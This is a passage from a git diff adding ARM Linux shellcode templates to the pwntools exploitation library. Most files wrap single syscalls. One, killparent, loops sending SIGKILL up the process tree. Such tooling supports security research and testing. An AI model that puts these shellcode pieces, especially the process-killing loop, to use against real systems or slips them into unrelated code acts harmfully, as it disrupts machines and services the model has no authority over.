b/pwnlib/shellcraft/templates/arm/linux/ioperm.asm new file mode 100644 index 000000000..a3d956d0c --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/ioperm.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="from, num, turn_on"/> +<%docstring> +Invokes the syscall ioperm. See 'man 2 ioperm' for more information. + +Arguments: + from(unsigned): from + num(unsigned): num + turn_on(int): turn_on + + + ${syscall('SYS_ioperm', from, num, turn_on)} diff --git a/pwnlib/shellcraft/templates/arm/linux/iopl.asm b/pwnlib/shellcraft/templates/arm/linux/iopl.asm new file mode 100644 index 000000000..b1e2e833b --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/iopl.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="level"/> +<%docstring> +Invokes the syscall iopl. See 'man 2 iopl' for more information. + +Arguments: + level(int): level + + + ${syscall('SYS_iopl', level)} diff --git a/pwnlib/shellcraft/templates/arm/linux/kill.asm b/pwnlib/shellcraft/templates/arm/linux/kill.asm new file mode 100644 index 000000000..f4e625ed7 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/kill.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="pid, sig"/> +<%docstring> +Invokes the syscall kill. See 'man 2 kill' for more information. + +Arguments: + pid(pid_t): pid + sig(int): sig + + + ${syscall('SYS_kill', pid, sig)} diff --git a/pwnlib/shellcraft/templates/arm/linux/killparent.asm b/pwnlib/shellcraft/templates/arm/linux/killparent.asm new file mode 100644 index 000000000..8b487fc6e --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/killparent.asm @@ -0,0 +1,17 @@ +<% + from pwnlib.shellcraft.arm.linux import getppid, kill + from pwnlib.constants import SIGKILL + from pwnlib.shellcraft.common import label +%> +<%docstring> +Kills its parent process until whatever the parent is (probably init) +cannot be killed any longer. + +<% + killparent_loop = label('killparent') +%> +${killparent_loop}: + ${getppid()} + ${kill('r0', SIGKILL)} + cmp r0, r0 + beq ${killparent_loop} diff --git a/pwnlib/shellcraft/templates/arm/linux/lchown.asm b/pwnlib/shellcraft/templates/arm/linux/lchown.asm new file mode 100644 index 000000000..503311f07 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/lchown.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="file, owner, group"/> +<%docstring> +Invokes the syscall lchown. See 'man 2 lchown' for more information. + +Arguments: + file(char): file + owner(uid_t): owner + group(gid_t): group + + + ${syscall('SYS_lchown', file, owner, group)} diff --git a/pwnlib/shellcraft/templates/arm/linux/link.asm b/pwnlib/shellcraft/templates/arm/linux/link.asm new file mode 100644 index 000000000..9380c3d12 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/link.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="from, to"/> +<%docstring> +Invokes the syscall link. See 'man 2 link' for more information. + +Arguments: + from(char): from + to(char): to + + + ${syscall('SYS_link', from, to)} diff --git a/pwnlib/shellcraft/templates/arm/linux/linkat.asm b/pwnlib/shellcraft/templates/arm/linux/linkat.asm new file mode 100644 index 000000000..4e3c05b60 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/linkat.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fromfd, from, tofd, to, flags"/> +<%docstring> +Invokes the syscall linkat. See 'man 2 linkat' for more information. + +Arguments: + fromfd(int): fromfd + from(char): from + tofd(int): tofd + to(char): to + flags(int): flags + + + ${syscall('SYS_linkat', fromfd, from, tofd, to, flags)} diff --git a/pwnlib/shellcraft/templates/arm/linux/listen.asm b/pwnlib/shellcraft/templates/arm/linux/listen.asm new file mode 100644 index 000000000..b06e8c05b --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/listen.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, n"/> +<%docstring> +Invokes the syscall listen. See 'man 2 listen' for more information. + +Arguments: + fd(int): fd + n(int): n + + + ${syscall('SYS_listen', fd, n)} diff --git a/pwnlib/shellcraft/templates/arm/linux/lseek.asm b/pwnlib/shellcraft/templates/arm/linux/lseek.asm new file mode 100644 index 000000000..5fab4d5c1 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/lseek.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, offset, whence"/> +<%docstring> +Invokes the syscall lseek. See 'man 2 lseek' for more information. + +Arguments: + fd(int): fd + offset(off_t): offset + whence(int): whence + + + ${syscall('SYS_lseek', fd, offset, whence)} diff --git a/pwnlib/shellcraft/templates/arm/linux/lstat.asm b/pwnlib/shellcraft/templates/arm/linux/lstat.asm new file mode 100644 index 000000000..634a379ce --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/lstat.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="file, buf"/> +<%docstring> +Invokes the syscall lstat. See 'man 2 lstat' for more information. + +Arguments: + file(char): file + buf(stat): buf + + + ${syscall('SYS_lstat', file, buf)} diff --git a/pwnlib/shellcraft/templates/arm/linux/lstat64.asm b/pwnlib/shellcraft/templates/arm/linux/lstat64.asm new file mode 100644 index 000000000..616df819c --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/lstat64.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="file, buf"/> +<%docstring> +Invokes the syscall lstat64. See 'man 2 lstat64' for more information. + +Arguments: + file(char): file + buf(stat64): buf + + + ${syscall('SYS_lstat64', file, buf)} diff --git a/pwnlib/shellcraft/templates/arm/linux/madvise.asm b/pwnlib/shellcraft/templates/arm/linux/madvise.asm new file mode 100644 index 000000000..09ddfc066 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/madvise.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="addr, length, advice"/> +<%docstring> +Invokes the syscall madvise. See 'man 2 madvise' for more information. + +Arguments: + addr(void): addr + len(size_t): len + advice(int): advice + + + ${syscall('SYS_madvise', addr, length, advice)} diff --git a/pwnlib/shellcraft/templates/arm/linux/mincore.asm b/pwnlib/shellcraft/templates/arm/linux/mincore.asm new file mode 100644 index 000000000..111cee4bf --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/mincore.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="start, len, vec"/> +<%docstring> +Invokes the syscall mincore. See 'man 2 mincore' for more information. + +Arguments: + start(void): start + len(size_t): len + vec(unsigned): vec + + + ${syscall('SYS_mincore', start, len, vec)} diff --git a/pwnlib/shellcraft/templates/arm/linux/mkdir.asm b/pwnlib/shellcraft/templates/arm/linux/mkdir.asm new file mode 100644 index 000000000..d2cf88c23 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/mkdir.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="path, mode"/> +<%docstring> +Invokes the syscall mkdir. See 'man 2 mkdir' for more information. + +Arguments: + path(char): path + mode(mode_t): mode + + + ${syscall('SYS_mkdir', path, mode)} diff --git a/pwnlib/shellcraft/templates/arm/linux/mkdirat.asm b/pwnlib/shellcraft/templates/arm/linux/mkdirat.asm new file mode 100644 index 000000000..8aab83489 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/mkdirat.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, path, mode"/> +<%docstring> +Invokes the syscall mkdirat. See 'man 2 mkdirat' for more information. + +Arguments: + fd(int): fd + path(char): path + mode(mode_t): mode + + + ${syscall('SYS_mkdirat', fd, path, mode)} diff --git a/pwnlib/shellcraft/templates/arm/linux/mknod.asm b/pwnlib/shellcraft/templates/arm/linux/mknod.asm new file mode 100644 index 000000000..a7be8158b --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/mknod.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="path, mode, dev"/> +<%docstring> +Invokes the syscall mknod. See 'man 2 mknod' for more information. + +Arguments: + path(char): path + mode(mode_t): mode + dev(dev_t): dev + + + ${syscall('SYS_mknod', path, mode, dev)} diff --git a/pwnlib/shellcraft/templates/arm/linux/mknodat.asm b/pwnlib/shellcraft/templates/arm/linux/mknodat.asm new file mode 100644 index 000000000..1e5c3a2d8 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/mknodat.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, path, mode, dev"/> +<%docstring> +Invokes the syscall mknodat. See 'man 2 mknodat' for more information. + +Arguments: + fd(int): fd + path(char): path + mode(mode_t): mode + dev(dev_t): dev + + + ${syscall('SYS_mknodat', fd, path, mode, dev)} diff --git a/pwnlib/shellcraft/templates/arm/linux/mlock.asm b/pwnlib/shellcraft/templates/arm/linux/mlock.asm new file mode 100644 index 000000000..8a1e8f2bb --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/mlock.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="addr, len"/> +<%docstring> +Invokes the syscall mlock. See 'man 2 mlock' for more information. + +Arguments: + addr(void): addr + len(size_t): len + + + ${syscall('SYS_mlock', addr, len)} diff --git a/pwnlib/shellcraft/templates/arm/linux/mlockall.asm b/pwnlib/shellcraft/templates/arm/linux/mlockall.asm new file mode 100644 index 000000000..cca6484a3 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/mlockall.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="flags"/> +<%docstring> +Invokes the syscall mlockall. See 'man 2 mlockall' for more information. + +Arguments: + flags(int): flags + + + ${syscall('SYS_mlockall', flags)} diff --git a/pwnlib/shellcraft/templates/arm/linux/mmap.asm b/pwnlib/shellcraft/templates/arm/linux/mmap.asm new file mode 100644 index 000000000..f7d9d1f23 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/mmap.asm @@ -0,0 +1,18 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="addr, length, prot=7, flags=0x22, fd=-1, offset=0"/> +<%docstring> +Invokes the syscall mmap. See 'man 2 mmap' for more information. + +Arguments: + addr(void): addr + length(size_t): length + prot(int): prot + flags(int): flags + fd(int): fd + offset(off_t): offset + + + ${syscall('SYS_mmap2', addr, length, prot, flags, fd, offset)} diff --git a/pwnlib/shellcraft/templates/arm/linux/mprotect.asm b/pwnlib/shellcraft/templates/arm/linux/mprotect.asm new file mode 100644 index 000000000..e9d9ba289 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/mprotect.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="addr, length, prot"/> +<%docstring> +Invokes the syscall mprotect. See 'man 2 mprotect' for more information. + +Arguments: + addr(void): addr + length(size_t): length + prot(int): prot + + + ${syscall('SYS_mprotect', addr, length, prot)} diff --git a/pwnlib/shellcraft/templates/arm/linux/mq_notify.asm b/pwnlib/shellcraft/templates/arm/linux/mq_notify.asm new file mode 100644 index 000000000..2b325d499 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/mq_notify.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="mqdes, notification"/> +<%docstring> +Invokes the syscall mq_notify. See 'man 2 mq_notify' for more information. + +Arguments: + mqdes(mqd_t): mqdes + notification(sigevent): notification + + + ${syscall('SYS_mq_notify', mqdes, notification)} diff --git a/pwnlib/shellcraft/templates/arm/linux/mq_open.asm b/pwnlib/shellcraft/templates/arm/linux/mq_open.asm new file mode 100644 index 000000000..7a9f3a694 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/mq_open.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="name, oflag, vararg"/> +<%docstring> +Invokes the syscall mq_open. See 'man 2 mq_open' for more information. + +Arguments: + name(char): name + oflag(int): oflag + vararg(int): vararg + + + ${syscall('SYS_mq_open', name, oflag, vararg)} diff --git a/pwnlib/shellcraft/templates/arm/linux/mq_timedreceive.asm b/pwnlib/shellcraft/templates/arm/linux/mq_timedreceive.asm new file mode 100644 index 000000000..d04d8b158 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/mq_timedreceive.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="mqdes, msg_ptr, msg_len, msg_prio, abs_timeout"/> +<%docstring> +Invokes the syscall mq_timedreceive. See 'man 2 mq_timedreceive' for more information. + +Arguments: + mqdes(mqd_t): mqdes + msg_ptr(char): msg_ptr + msg_len(size_t): msg_len + msg_prio(unsigned): msg_prio + abs_timeout(timespec): abs_timeout + + + ${syscall('SYS_mq_timedreceive', mqdes, msg_ptr, msg_len, msg_prio, abs_timeout)} diff --git a/pwnlib/shellcraft/templates/arm/linux/mq_timedsend.asm b/pwnlib/shellcraft/templates/arm/linux/mq_timedsend.asm new file mode 100644 index 000000000..0442539ba --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/mq_timedsend.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="mqdes, msg_ptr, msg_len, msg_prio, abs_timeout"/> +<%docstring> +Invokes the syscall mq_timedsend. See 'man 2 mq_timedsend' for more information. + +Arguments: + mqdes(mqd_t): mqdes + msg_ptr(char): msg_ptr + msg_len(size_t): msg_len + msg_prio(unsigned): msg_prio + abs_timeout(timespec): abs_timeout + + + ${syscall('SYS_mq_timedsend', mqdes, msg_ptr, msg_len, msg_prio, abs_timeout)} diff --git a/pwnlib/shellcraft/templates/arm/linux/mq_unlink.asm b/pwnlib/shellcraft/templates/arm/linux/mq_unlink.asm new file mode 100644 index 000000000..300fbb376 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/mq_unlink.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="name"/> +<%docstring> +Invokes the syscall mq_unlink. See 'man 2 mq_unlink' for more information. + +Arguments: + name(char): name + + + ${syscall('SYS_mq_unlink', name)} diff --git a/pwnlib/shellcraft/templates/arm/linux/mremap.asm b/pwnlib/shellcraft/templates/arm/linux/mremap.asm new file mode 100644 index 000000000..2728bb9ed --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/mremap.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="addr, old_len, new_len, flags, vararg"/> +<%docstring> +Invokes the syscall mremap. See 'man 2 mremap' for more information. + +Arguments: + addr(void): addr + old_len(size_t): old_len + new_len(size_t): new_len + flags(int): flags + vararg(int): vararg + + + ${syscall('SYS_mremap', addr, old_len, new_len, flags, vararg)} diff --git a/pwnlib/shellcraft/templates/arm/linux/msync.asm b/pwnlib/shellcraft/templates/arm/linux/msync.asm new file mode 100644 index 000000000..c3a35e95b --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/msync.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="addr, len, flags"/> +<%docstring> +Invokes the syscall msync. See 'man 2 msync' for more information. + +Arguments: + addr(void): addr + len(size_t): len + flags(int): flags + + + ${syscall('SYS_msync', addr, len, flags)} diff --git a/pwnlib/shellcraft/templates/arm/linux/munlock.asm b/pwnlib/shellcraft/templates/arm/linux/munlock.asm new file mode 100644 index 000000000..6bb6c75ce --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/munlock.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="addr, len"/> +<%docstring> +Invokes the syscall munlock. See 'man 2 munlock' for more information. + +Arguments: + addr(void): addr + len(size_t): len + + + ${syscall('SYS_munlock', addr, len)} diff --git a/pwnlib/shellcraft/templates/arm/linux/munlockall.asm b/pwnlib/shellcraft/templates/arm/linux/munlockall.asm new file mode 100644 index 000000000..c47fb95b5 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/munlockall.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall munlockall. See 'man 2 munlockall' for more information. + +Arguments: + + + + ${syscall('SYS_munlockall')} diff --git a/pwnlib/shellcraft/templates/arm/linux/munmap.asm b/pwnlib/shellcraft/templates/arm/linux/munmap.asm new file mode 100644 index 000000000..5db211e74 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/munmap.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="addr, length"/> +<%docstring> +Invokes the syscall munmap. See 'man 2 munmap' for more information. + +Arguments: + addr(void): addr + length(size_t): length + + + ${syscall('SYS_munmap', addr, length)} diff --git a/pwnlib/shellcraft/templates/arm/linux/nanosleep.asm b/pwnlib/shellcraft/templates/arm/linux/nanosleep.asm new file mode 100644 index 000000000..541861c3e --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/nanosleep.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="requested_time, remaining"/> +<%docstring> +Invokes the syscall nanosleep. See 'man 2 nanosleep' for more information. + +Arguments: + requested_time(timespec): requested_time + remaining(timespec): remaining + + + ${syscall('SYS_nanosleep', requested_time, remaining)} diff --git a/pwnlib/shellcraft/templates/arm/linux/nice.asm b/pwnlib/shellcraft/templates/arm/linux/nice.asm new file mode 100644 index 000000000..a848f1b3d --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/nice.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="inc"/> +<%docstring> +Invokes the syscall nice. See 'man 2 nice' for more information. + +Arguments: + inc(int): inc + + + ${syscall('SYS_nice', inc)} diff --git a/pwnlib/shellcraft/templates/arm/linux/open.asm b/pwnlib/shellcraft/templates/arm/linux/open.asm new file mode 100644 index 000000000..a60f58be1 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/open.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="file, oflag, vararg"/> +<%docstring> +Invokes the syscall open. See 'man 2 open' for more information. + +Arguments: + file(char): file + oflag(int): oflag + vararg(int): vararg + + + ${syscall('SYS_open', file, oflag, vararg)} diff --git a/pwnlib/shellcraft/templates/arm/linux/openat.asm b/pwnlib/shellcraft/templates/arm/linux/openat.asm new file mode 100644 index 000000000..11ebe4a60 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/openat.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, file, oflag, vararg"/> +<%docstring> +Invokes the syscall openat. See 'man 2 openat' for more information. + +Arguments: + fd(int): fd + file(char): file + oflag(int): oflag + vararg(int): vararg + + + ${syscall('SYS_openat', fd, file, oflag, vararg)} diff --git a/pwnlib/shellcraft/templates/arm/linux/pause.asm b/pwnlib/shellcraft/templates/arm/linux/pause.asm new file mode 100644 index 000000000..a0f743dd8 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/pause.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall pause. See 'man 2 pause' for more information. + +Arguments: + + + + ${syscall('SYS_pause')} diff --git a/pwnlib/shellcraft/templates/arm/linux/pipe.asm b/pwnlib/shellcraft/templates/arm/linux/pipe.asm new file mode 100644 index 000000000..5952b3711 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/pipe.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="pipedes"/> +<%docstring> +Invokes the syscall pipe. See 'man 2 pipe' for more information. + +Arguments: + pipedes(int): pipedes + + + ${syscall('SYS_pipe', pipedes)} diff --git a/pwnlib/shellcraft/templates/arm/linux/pipe2.asm b/pwnlib/shellcraft/templates/arm/linux/pipe2.asm new file mode 100644 index 000000000..631f314a0 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/pipe2.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="pipedes, flags"/> +<%docstring> +Invokes the syscall pipe2. See 'man 2 pipe2' for more information. + +Arguments: + pipedes(int): pipedes + flags(int): flags + + + ${syscall('SYS_pipe2', pipedes, flags)} diff --git a/pwnlib/shellcraft/templates/arm/linux/poll.asm b/pwnlib/shellcraft/templates/arm/linux/poll.asm new file mode 100644 index 000000000..870c062ad --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/poll.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fds, nfds, timeout"/> +<%docstring> +Invokes the syscall poll. See 'man 2 poll' for more information. + +Arguments: + fds(pollfd): fds + nfds(nfds_t): nfds + timeout(int): timeout + + + ${syscall('SYS_poll', fds, nfds, timeout)} diff --git a/pwnlib/shellcraft/templates/arm/linux/ppoll.asm b/pwnlib/shellcraft/templates/arm/linux/ppoll.asm new file mode 100644 index 000000000..21f816986 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/ppoll.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fds, nfds, timeout, ss"/> +<%docstring> +Invokes the syscall ppoll. See 'man 2 ppoll' for more information. + +Arguments: + fds(pollfd): fds + nfds(nfds_t): nfds + timeout(timespec): timeout + ss(sigset_t): ss + + + ${syscall('SYS_ppoll', fds, nfds, timeout, ss)} diff --git a/pwnlib/shellcraft/templates/arm/linux/prctl.asm b/pwnlib/shellcraft/templates/arm/linux/prctl.asm new file mode 100644 index 000000000..33b93fc2b --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/prctl.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="option, *vararg"/> +<%docstring> +Invokes the syscall prctl. See 'man 2 prctl' for more information. + +Arguments: + option(int): option + vararg(int): vararg + + + ${syscall('SYS_prctl', option, *vararg)} diff --git a/pwnlib/shellcraft/templates/arm/linux/pread.asm b/pwnlib/shellcraft/templates/arm/linux/pread.asm new file mode 100644 index 000000000..f9bf4d1da --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/pread.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, buf, nbytes, offset"/> +<%docstring> +Invokes the syscall pread. See 'man 2 pread' for more information. + +Arguments: + fd(int): fd + buf(void): buf + nbytes(size_t): nbytes + offset(off_t): offset + + + ${syscall('SYS_pread', fd, buf, nbytes, offset)} diff --git a/pwnlib/shellcraft/templates/arm/linux/preadv.asm b/pwnlib/shellcraft/templates/arm/linux/preadv.asm new file mode 100644 index 000000000..9074e9436 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/preadv.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, iovec, count, offset"/> +<%docstring> +Invokes the syscall preadv. See 'man 2 preadv' for more information. + +Arguments: + fd(int): fd + iovec(iovec): iovec + count(int): count + offset(off_t): offset + + + ${syscall('SYS_preadv', fd, iovec, count, offset)} diff --git a/pwnlib/shellcraft/templates/arm/linux/prlimit64.asm b/pwnlib/shellcraft/templates/arm/linux/prlimit64.asm new file mode 100644 index 000000000..3ef67d9aa --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/prlimit64.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="pid, resource, new_limit, old_limit"/> +<%docstring> +Invokes the syscall prlimit64. See 'man 2 prlimit64' for more information. + +Arguments: + pid(pid_t): pid + resource(rlimit_resource): resource + new_limit(rlimit64): new_limit + old_limit(rlimit64): old_limit + + + ${syscall('SYS_prlimit64', pid, resource, new_limit, old_limit)} diff --git a/pwnlib/shellcraft/templates/arm/linux/profil.asm b/pwnlib/shellcraft/templates/arm/linux/profil.asm new file mode 100644 index 000000000..3150b8c07 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/profil.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="sample_buffer, size, offset, scale"/> +<%docstring> +Invokes the syscall profil. See 'man 2 profil' for more information. + +Arguments: + sample_buffer(unsigned): sample_buffer + size(size_t): size + offset(size_t): offset + scale(unsigned): scale + + + ${syscall('SYS_profil', sample_buffer, size, offset, scale)} diff --git a/pwnlib/shellcraft/templates/arm/linux/ptrace.asm b/pwnlib/shellcraft/templates/arm/linux/ptrace.asm new file mode 100644 index 000000000..94279dbc0 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/ptrace.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="request, vararg"/> +<%docstring> +Invokes the syscall ptrace. See 'man 2 ptrace' for more information. + +Arguments: + request(ptrace_request): request + vararg(int): vararg + + + ${syscall('SYS_ptrace', request, vararg)} diff --git a/pwnlib/shellcraft/templates/arm/linux/putpmsg.asm b/pwnlib/shellcraft/templates/arm/linux/putpmsg.asm new file mode 100644 index 000000000..d0a6bc062 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/putpmsg.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fildes, ctlptr, dataptr, band, flags"/> +<%docstring> +Invokes the syscall putpmsg. See 'man 2 putpmsg' for more information. + +Arguments: + fildes(int): fildes + ctlptr(strbuf): ctlptr + dataptr(strbuf): dataptr + band(int): band + flags(int): flags + + + ${syscall('SYS_putpmsg', fildes, ctlptr, dataptr, band, flags)} diff --git a/pwnlib/shellcraft/templates/arm/linux/pwrite.asm b/pwnlib/shellcraft/templates/arm/linux/pwrite.asm new file mode 100644 index 000000000..ed5525a29 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/pwrite.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, buf, n, offset"/> +<%docstring> +Invokes the syscall pwrite. See 'man 2 pwrite' for more information. + +Arguments: + fd(int): fd + buf(void): buf + n(size_t): n + offset(off_t): offset + + + ${syscall('SYS_pwrite', fd, buf, n, offset)} diff --git a/pwnlib/shellcraft/templates/arm/linux/pwritev.asm b/pwnlib/shellcraft/templates/arm/linux/pwritev.asm new file mode 100644 index 000000000..dc85257dd --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/pwritev.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, iovec, count, offset"/> +<%docstring> +Invokes the syscall pwritev. See 'man 2 pwritev' for more information. + +Arguments: + fd(int): fd + iovec(iovec): iovec + count(int): count + offset(off_t): offset + + + ${syscall('SYS_pwritev', fd, iovec, count, offset)} diff --git a/pwnlib/shellcraft/templates/arm/linux/readahead.asm b/pwnlib/shellcraft/templates/arm/linux/readahead.asm new file mode 100644 index 000000000..98ff4ee8d --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/readahead.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, offset, count"/> +<%docstring> +Invokes the syscall readahead. See 'man 2 readahead' for more information. + +Arguments: + fd(int): fd + offset(off64_t): offset + count(size_t): count + + + ${syscall('SYS_readahead', fd, offset, count)} diff --git a/pwnlib/shellcraft/templates/arm/linux/readdir.asm b/pwnlib/shellcraft/templates/arm/linux/readdir.asm new file mode 100644 index 000000000..2041fed0e --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/readdir.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="dirp"/> +<%docstring> +Invokes the syscall readdir. See 'man 2 readdir' for more information. + +Arguments: + dirp(DIR): dirp + + + ${syscall('SYS_readdir', dirp)} diff --git a/pwnlib/shellcraft/templates/arm/linux/readlink.asm b/pwnlib/shellcraft/templates/arm/linux/readlink.asm new file mode 100644 index 000000000..370212a8d --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/readlink.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="path, buf, len"/> +<%docstring> +Invokes the syscall readlink. See 'man 2 readlink' for more information. + +Arguments: + path(char): path + buf(char): buf + len(size_t): len + + + ${syscall('SYS_readlink', path, buf, len)} diff --git a/pwnlib/shellcraft/templates/arm/linux/readlinkat.asm b/pwnlib/shellcraft/templates/arm/linux/readlinkat.asm new file mode 100644 index 000000000..503f2be1b --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/readlinkat.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, path, buf, len"/> 